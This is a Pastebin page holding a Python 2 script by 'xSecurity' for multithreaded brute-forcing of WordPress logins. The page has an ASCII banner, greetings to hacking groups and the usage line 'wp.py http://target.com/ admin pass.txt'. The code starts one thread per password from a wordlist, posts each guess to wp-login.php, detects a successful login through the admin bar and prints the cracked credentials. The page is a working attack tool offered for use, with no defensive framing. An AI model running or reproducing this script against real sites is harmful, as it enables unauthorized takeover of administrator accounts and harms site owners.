insaneisnotfree

Multithreaded wordpress brute force

May 16th, 2014
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.91 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Video: http://youtu.be/mURnM-Yp72g
  3. # Coded By: xSecurity
  4.  
  5. import urllib, urllib2, os, sys, requests as xsec, re
  6. from time import sleep
  7. from threading import Thread
  8. def cls():
  9.     linux = 'clear'
  10.     windows = 'cls'
  11.     os.system([linux,windows][os.name == 'nt'])
  12. cls()
  13. print '''
  14.       __                      _ _        
  15. __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
  16. \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
  17. >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
  18. /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
  19.                                     |___/WordPress Brute Muliththreading :)
  20. #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
  21. #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
  22. Special For My Lov3r Cyber-Crystal
  23. #Usage: Python wp.py http://target.com/ admin pass.txt
  24. #Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
  25.  
  26. xsec = xsec.session()
  27. def brute(target,usr,pwd):
  28.     get = xsec.get(target+'/wp-admin/')
  29.     post = {}
  30.     post["log"] = usr
  31.     post["pwd"] = pwd
  32.     post["wp-submit"] = "Log+in"
  33.     post["redirect_to"] = target
  34.     post["testcookie"] = "1"
  35.     get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
  36.     get3 = xsec.get(target+'/wp-admin')
  37.     if '<li id="wp-admin-bar-logout">' in get3.text:
  38.         print '[+] Cracked Username: '+usr+' & Password: '+pwd
  39.         os._exit(1)
  40.     else:
  41.         print '[~] Trying ...: '+pwd
  42.  
  43. if len(sys.argv) >= 3:
  44.     target = sys.argv[1]
  45.     usr = sys.argv[2]
  46.     lst = open(sys.argv[3]).read().split("\n")
  47.     print '[*]Target: '+target
  48.     print '[*]LIST:',len(lst)
  49.     print '[*]Username: '+usr
  50.     thrdlst = []
  51.     for pwd in lst:
  52.         t = Thread(target=brute, args=(target,usr,pwd))
  53.         t.start()
  54.         thrdlst.append(t)
  55.         sleep(0.009)
  56.     for b in thrdlst:
  57.         b.join()
  58. else:
  59.     print '[>]There Somthing Missing Check ARGVS :)'
Add Comment
Please, Sign In to add comment